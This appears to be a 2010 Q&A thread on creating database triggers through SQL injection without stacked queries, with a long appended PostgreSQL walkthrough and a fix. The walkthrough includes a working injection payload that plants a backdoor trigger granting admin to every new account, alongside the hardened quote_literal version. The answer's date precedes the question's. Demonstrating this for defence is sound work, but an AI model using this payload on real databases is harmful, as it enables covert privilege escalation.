Create database triggers with SQL injection without stacked queries

0 votes
asked Mar 27, 2010 by henri

Currently I'm working on a research paper about SQL injection with RFID tags, and I'm curious whether it is possible to create a database trigger with an SQL injection if stacked queries are disabled. If stacked queries are enabled it is of course easy (assuming you know the table layout), but what if they're disabled for security reasons?

The question is whether it is possible to create a trigger, given that there is an SQL injection. The database does not matter; choose one that fits the needs.

1 Answer

0 votes
answered Mar 4, 2010 by frank-heikens

What database are you looking for? In PostgreSQL every trigger calls a stored procedure. Inside a stored procedure you can execute dynamic queries if you want. If you don't do anything against SQL injection, i.e. not using quote_ident() and/or quote_literal(), your procedure is vulnerable to SQL injection. That's your own choice.

User input can never be trusted, so why worry about RFID input? It's input; therefore it can't be trusted.
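The scenario the answer describes, worked through as an added example (this is not code from the question or the answer). It assumes PostgreSQL 11 or later with PL/pgSQL; every table, column, function and trigger name (rfid_reads, rfid_reads_log, accounts, log_read_unsafe, backdoor, backdoor_t) is hypothetical, and the tag content is a constructed payload. The application performs one parameterised INSERT, so stacked queries are impossible at that layer; the trigger's own dynamic SQL is what re-opens them, because the string handed to EXECUTE is parsed by the server as fresh SQL:

```sql
-- Added example, not part of the original thread.  Assumes PostgreSQL 11+
-- (EXECUTE FUNCTION syntax) with PL/pgSQL; all object names are hypothetical.

CREATE TABLE rfid_reads     (id serial PRIMARY KEY, tag_uid text NOT NULL);
CREATE TABLE rfid_reads_log (id serial PRIMARY KEY, note text NOT NULL);
CREATE TABLE accounts       (id serial PRIMARY KEY, username text NOT NULL,
                             role text NOT NULL DEFAULT 'user');

-- 1. Vulnerable trigger function: the audit statement is assembled by string
--    concatenation and given to EXECUTE, which parses the result as new SQL.
CREATE OR REPLACE FUNCTION log_read_unsafe() RETURNS trigger AS $$
BEGIN
  EXECUTE 'INSERT INTO ' || TG_TABLE_NAME || '_log(note) VALUES (''read tag '
          || NEW.tag_uid || ''')';
  RETURN NEW;
END;
$$ LANGUAGE plpgsql;

CREATE TRIGGER rfid_reads_audit AFTER INSERT ON rfid_reads
  FOR EACH ROW EXECUTE FUNCTION log_read_unsafe();

-- 2. The application only ever runs a single INSERT with the tag as a value
--    (shown here as a literal).  Constructed payload: it closes the literal the
--    trigger builds, appends two DDL statements, and comments out the trigger's
--    trailing quote and parenthesis.  The newly created trigger is put on a
--    different table so it does not touch the one being modified.
INSERT INTO rfid_reads(tag_uid) VALUES ($payload$x');
  CREATE OR REPLACE FUNCTION backdoor() RETURNS trigger AS $f$
    BEGIN NEW.role := 'admin'; RETURN NEW; END $f$ LANGUAGE plpgsql;
  CREATE TRIGGER backdoor_t BEFORE INSERT ON accounts
    FOR EACH ROW EXECUTE FUNCTION backdoor(); --$payload$);

-- 3. Check: the attacker's trigger exists although the application never
--    issued a stacked query, and every new account is silently an admin.
SELECT tgname FROM pg_trigger WHERE tgname = 'backdoor_t';   -- one row
INSERT INTO accounts(username) VALUES ('alice');
SELECT username, role FROM accounts;                          -- alice | admin

-- 4. Hardened version, as the answer suggests: quote_ident() for the identifier,
--    quote_literal() for the value.  format('INSERT INTO %I(note) VALUES (%L)', ...)
--    is the equivalent shorthand.  Where the statement shape is fixed, a plain
--    static INSERT with NEW.tag_uid as a value needs no dynamic SQL at all.
CREATE OR REPLACE FUNCTION log_read_safe() RETURNS trigger AS $$
BEGIN
  EXECUTE 'INSERT INTO ' || quote_ident(TG_TABLE_NAME || '_log')
          || '(note) VALUES (' || quote_literal('read tag ' || NEW.tag_uid) || ')';
  RETURN NEW;
END;
$$ LANGUAGE plpgsql;

DROP TRIGGER backdoor_t ON accounts;
DROP FUNCTION backdoor();
DROP TRIGGER rfid_reads_audit ON rfid_reads;
CREATE TRIGGER rfid_reads_audit AFTER INSERT ON rfid_reads
  FOR EACH ROW EXECUTE FUNCTION log_read_safe();

-- 5. Replay the same payload through the hardened trigger: it is stored as
--    plain text in the log and no trigger is created.
INSERT INTO rfid_reads(tag_uid) SELECT tag_uid FROM rfid_reads WHERE id = 1;
SELECT count(*) FROM pg_trigger WHERE tgname = 'backdoor_t';  -- 0
SELECT note FROM rfid_reads_log ORDER BY id DESC LIMIT 1;      -- the payload, verbatim
```

The practical check for a review is therefore not only "does the driver allow stacked queries" but "does any trigger, stored procedure or view reached by this statement build SQL from the row's values". Disabling stacked queries at the client protects the first statement only; anything the server executes dynamically on its behalf has to escape or parameterise its inputs itself.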
